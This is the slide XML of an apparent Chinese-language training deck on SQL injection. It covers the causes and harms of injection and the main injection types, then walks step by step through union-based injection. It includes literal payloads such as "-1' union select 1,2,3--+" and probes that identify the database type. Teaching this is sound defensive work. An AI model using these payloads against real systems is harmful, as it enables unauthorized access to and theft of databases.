            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>OWASP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TOP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10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>常年位居首位</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 TOP 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>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安全中的权威指南，它包含了最常见的十种</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漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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4046" y="7620919"/>
            <a:ext cx="7219950" cy="4813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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9276113" y="8461366"/>
            <a:ext cx="5297137" cy="3972853"/>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0180159"/>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2</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注入漏洞的危害：</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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据泄露：</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据篡改：</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>拒绝服务：</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>远程执行代码：</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581804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p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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如果</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应用开发人员无法保证在将从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表单、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>及输入参数等收到的值传递给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查询（该查询在数据库服务器上执行）之前已经对其进行过验证，那么通常会出现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注入漏洞。如果攻击者能够控制发送给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查询的输入，并且能够操纵该输入将其解析为代码而非数据，那么攻击者就很有可能在后台数据库执行该代码。</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注入漏洞产生的原因可以大致分为以下几类：</a:t>
            </a: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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>转义字符处理不当：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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>类型处理不当：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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>查询语句组装不当：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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>错误处理不当：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400" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、多个提交处理不当</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、数据库配置问题</a:t>
            </a:r>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4623683"/>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不正确的输入验证和过滤：应用程序未对用户输入进行充分的验证和过滤，没有对输入进行正确的检查，或者依赖于不安全的字符转义函数来处理用户输入。这使得攻击者可以插入恶意的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拼接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查询字符串：应用程序通过简单地将用户输入直接拼接到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查询字符串中来构建查询语句，而没有使用参数化查询或预编译语句。这使得攻击者能够注入恶意代码来修改原始查询的逻辑。</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查询：应用程序根据用户输入或其他动态条件来动态构造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查询，但没有正确地验证和过滤这些动态构造的部分。攻击者可以通过修改动态构造的部分来注入恶意代码。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盲目信任用户输入：应用程序过度信任用户输入数据的可靠性和完整性，未进行适当的检查和验证。攻击者可以利用这种信任来注入恶意代码。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不安全的权限和访问控制：应用程序可能未正确设置和限制数据库用户的权限，或者没有正确实施访问控制机制。这可能允许攻击者执行未授权的数据库操作。</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不安全的错误处理：应用程序在出现错误时，可能会泄露敏感的错误信息，包括数据库结构、查询语句和数据。攻击者可以利用这些信息来进一步利用和利用注入漏洞。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392" y="2763520"/>
            <a:ext cx="21777216" cy="4832092"/>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a:t>
            </a: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根据注入技巧，</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注入可大致分为以下几类。</a:t>
            </a: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、联合查询注入（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union select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、二次注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11494770" y="5314950"/>
            <a:ext cx="8943975" cy="4038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729" y="2153920"/>
            <a:ext cx="21777216" cy="698652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注入类型判断</a:t>
            </a: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根据输入的参数，</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注入可分为数字型和字符型和搜索型</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数字型直接带入查询：</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字符型需闭合后带入查询：</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 </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搜索型：</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一般出现在查询搜索处，要进行搜索型注入，我们还得了解一下</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数据查询中</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where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子句使用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操作符的知识，</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操作符所起的作用就是模糊查询，要使用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进行模糊查询必须还要配合通配符才能完成，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就是</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操作符中的一种通配符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它代表零个或多个任意字符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为了大家理解</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为大家举了一些例子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开始的任意字符</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返回以包含</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的任意字符</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11879698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1045160"/>
            <a:ext cx="4246416" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="4246415" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="76" name="Group 184"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="4246415" cy="1122683"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="4246415"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2351923"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456613"/>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2" name="Group 204"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13020573" y="3743991"/>
            <a:ext cx="6182844" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="6182842" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 202"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="6182842" cy="1122683"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="6182841" cy="1122681"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5"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4"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7" name="Group 204"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13020573" y="2448178"/>
            <a:ext cx="4131001" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="4131000" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 202"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="4131000" cy="1122683"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="4131000" cy="1122681"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10"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11" name="Shape 200"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="2236508"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信息收集</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9"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360"/>
            <a:ext cx="13381990" cy="8679299"/>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、联合查询注入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latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>联合查询注入顾名思义，就是使用联合查询进行注入的一种方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。在执行联合查询时，使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前的查询为空，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后面的语句查询结果输出到显示位置上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>适用情况：页面上有显示位。</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步骤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.判断是否有注入点和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句的闭合形式</a:t>
            </a:r>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假设参数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句的闭合形式大概有整形闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单引号闭合，双引号闭合，以及引号加一个或多个括号的情况：</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(‘1’),(“1”),((“1”))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，如果参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加上了闭合字符导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句提前闭合，就会产生报错（搜索型可加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>作为闭合参数）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.order by 猜解列数，并使用union select得到显示位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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3 --+   （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>order by 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时排序第三个栏位）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"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3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断显示位（让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前面的语句没有结果，从而显示后面的，爆出回显位）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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> -1' union select 1,2,3--+</a:t>
            </a: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a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15684500" y="3229610"/>
            <a:ext cx="6557645" cy="79406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521515C5-E0A5-AA9D-CE20-CC9AE4408E27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="2294900"/>
            <a:ext cx="21470068" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断数据库类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL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sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)&gt;0 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ACCESE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msysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)&gt;0 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL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information_schema.TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)&gt; --+ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle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sys.user_tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)&gt;0 --+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D5016B-FE96-0A58-C034-003C77DBA8D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4AAAD6-AD38-3F51-B129-5D0D899AA1BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7226555" y="5161267"/>
            <a:ext cx="9949222" cy="5113227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34087874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EF4146D9-D8F8-C157-EBDC-69F8DE10FBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187928" y="6211921"/>
            <a:ext cx="8008144" cy="6230512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C568F5C-3F10-1CCF-4B18-444D0A612F38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="2426673"/>
            <a:ext cx="21241468" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
